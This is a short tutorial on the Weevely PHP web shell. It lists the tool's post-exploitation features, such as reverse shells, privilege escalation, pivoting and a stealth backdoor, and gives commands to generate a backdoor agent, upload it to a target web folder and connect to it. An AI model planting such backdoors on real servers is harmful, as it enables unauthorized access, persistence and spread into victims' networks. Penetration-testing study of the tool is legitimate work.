Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at run time.
Upload weevely PHP agent to a target web server to get remote shell access to it via a small footprint PHP agent. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
Download the Git file:
Download via your browser:
Download via wget (in your terminal):
Generate the backdoor agent
Weevely client communicates to the PHP agent installed into the target. Move to the
weevely3/ folder and run
./weevely.py to print help or just simply type weevely in your terminal.
root@blackhattutorial:~# weevely [+] weevely 3.2.0 [!] Error: too few arguments [+] Run terminal to the target weevely <URL> <password> [cmd] [+] Load session file weevely session <path> [cmd] [+] Generate backdoor agent weevely generate <password> <path>
To generate a new agent, just use the
generate option passing the password and path arguments.
root@blackhattutorial:~# weevely generate 123 /root/Desktop/backdoor.php Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.
Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.
Connect to the agent
Launch weevely script to connect to the remote agent.
root@blackhattutorial:~# weevely http://localhost/backdoor.php 123 weevely>
The first prompt weevely> is still not connected to allow users to set any useful pre-connection option e.g. set proxies to be used. Running a real command starts automatically the session on the remote target.
weevely> uname -a Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-2kali1 (2020-06-10) x86_64 GNU/Linux